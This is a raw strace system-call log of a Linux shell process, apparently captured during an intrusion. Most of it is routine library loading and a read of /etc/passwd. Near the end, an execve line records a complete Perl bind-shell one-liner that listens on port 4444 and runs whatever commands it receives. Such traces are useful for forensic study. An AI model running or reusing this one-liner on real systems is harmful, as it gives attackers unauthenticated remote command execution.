12543 20:27:58.051956 open("/etc/nsswitch.conf", O_RDONLY) = 1
12543 20:27:58.051971 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
12543 20:27:58.051988 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f35000
12543 20:27:58.051999 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
12543 20:27:58.052049 read(1, "", 4096) = 0
12543 20:27:58.052059 close(1)          = 0
12543 20:27:58.052069 munmap(0xb7f35000, 4096) = 0
12543 20:27:58.052085 open("/etc/ld.so.cache", O_RDONLY) = 1
12543 20:27:58.052098 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12543 20:27:58.052114 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f2e000
12543 20:27:58.052124 close(1)          = 0
12543 20:27:58.052135 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.052150 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
12543 20:27:58.052166 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
12543 20:27:58.052259 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
12543 20:27:58.052277 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da0000
12543 20:27:58.052289 mmap2(0xb7da7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7da7000
12543 20:27:58.052307 close(1)          = 0
12543 20:27:58.052319 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.052332 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
12543 20:27:58.052346 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
12543 20:27:58.052442 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
12543 20:27:58.052460 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d88000
12543 20:27:58.052472 mmap2(0xb7d9c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d9c000
12543 20:27:58.052488 mmap2(0xb7d9e000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d9e000
12543 20:27:58.052503 close(1)          = 0
12543 20:27:58.052529 munmap(0xb7f2e000, 29913) = 0
12543 20:27:58.052546 open("/etc/ld.so.cache", O_RDONLY) = 1
12543 20:27:58.052559 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12543 20:27:58.052576 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f2e000
12543 20:27:58.052586 close(1)          = 0
12543 20:27:58.052596 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.052611 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
12543 20:27:58.052626 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
12543 20:27:58.052720 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
12543 20:27:58.052738 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7e000
12543 20:27:58.052749 mmap2(0xb7d86000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d86000
12543 20:27:58.052766 close(1)          = 0
12543 20:27:58.052778 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.052792 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
12543 20:27:58.052806 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
12543 20:27:58.053572 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
12543 20:27:58.053591 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d73000
12543 20:27:58.053603 mmap2(0xb7d7c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d7c000
12543 20:27:58.053621 close(1)          = 0
12543 20:27:58.053642 munmap(0xb7f2e000, 29913) = 0
12543 20:27:58.053658 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
12543 20:27:58.053673 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
12543 20:27:58.053685 _llseek(1, 0, [0], SEEK_CUR) = 0
12543 20:27:58.053697 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
12543 20:27:58.053714 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f35000
12543 20:27:58.053725 _llseek(1, 1624, [1624], SEEK_SET) = 0
12543 20:27:58.053741 munmap(0xb7f35000, 1624) = 0
12543 20:27:58.053751 close(1)          = 0
12543 20:27:58.053779 getpgrp()         = 3831
12543 20:27:58.053789 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
12543 20:27:58.053805 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
12543 20:27:58.053821 brk(0x8101000)    = 0x8101000
12543 20:27:58.053854 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12543 20:27:58.053869 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12543 20:27:58.053884 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12543 20:27:58.053921 brk(0x8102000)    = 0x8102000
12543 20:27:58.053948 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12543 20:27:58.053967 stat64("/sbin/AB", 0xbfdd6c28) = -1 ENOENT (No such file or directory)
12543 20:27:58.053980 stat64("/bin/AB", 0xbfdd6c28) = -1 ENOENT (No such file or directory)
12543 20:27:58.053991 stat64("/usr/sbin/AB", 0xbfdd6c28) = -1 ENOENT (No such file or directory)
12543 20:27:58.054003 stat64("/usr/bin/AB", 0xbfdd6c28) = -1 ENOENT (No such file or directory)
12543 20:27:58.054029 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
12543 20:27:58.054052 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da96f8) = 12544
12544 20:27:58.054124 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12544 20:27:58.054147 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
12544 20:27:58.054167 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
12544 20:27:58.054186 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
12544 20:27:58.054208 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12544 20:27:58.054230 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12544 20:27:58.054248 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
12544 20:27:58.054309 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
12544 20:27:58.054323 --- SIGPIPE (Broken pipe) @ 0 (0) ---
12544 20:27:58.054394 exit_group(127)   = ?
4519  20:27:58.581407 waitpid(12543,  <unfinished ...>
12543 20:27:58.581461 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12543 20:27:58.601448 --- SIGCHLD (Child exited) @ 0 (0) ---
12543 20:27:58.601498 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12544
12543 20:27:58.601518 waitpid(-1, 0xbfdd68a8, WNOHANG) = -1 ECHILD (No child processes)
12543 20:27:58.601529 sigreturn()       = ? (mask now [])
12543 20:27:58.601554 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
12543 20:27:58.601570 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12543 20:27:58.601581 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
12543 20:27:58.601594 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
12543 20:27:58.601613 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12543 20:27:58.601624 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
12543 20:27:58.601661 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12543 20:27:58.601682 stat64("/sbin/perl", 0xbfdd6c58) = -1 ENOENT (No such file or directory)
12543 20:27:58.601695 stat64("/bin/perl", 0xbfdd6c58) = -1 ENOENT (No such file or directory)
12543 20:27:58.601707 stat64("/usr/sbin/perl", 0xbfdd6c58) = -1 ENOENT (No such file or directory)
12543 20:27:58.601719 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
12543 20:27:58.601737 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
12543 20:27:58.601763 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
12543 20:27:58.601778 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da96f8) = 12545
12545 20:27:58.621520 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12545 20:27:58.621579 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
12545 20:27:58.621592 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
12545 20:27:58.621604 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
12545 20:27:58.621619 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12545 20:27:58.621635 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12545 20:27:58.621647 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
12545 20:27:58.621684 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
12545 20:27:58.621778 brk(0)            = 0x8153000
12545 20:27:58.621800 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12545 20:27:58.621816 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f63000
12545 20:27:58.621832 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
12545 20:27:58.621849 open("/etc/ld.so.cache", O_RDONLY) = 1
12545 20:27:58.621861 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12545 20:27:58.621879 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5b000
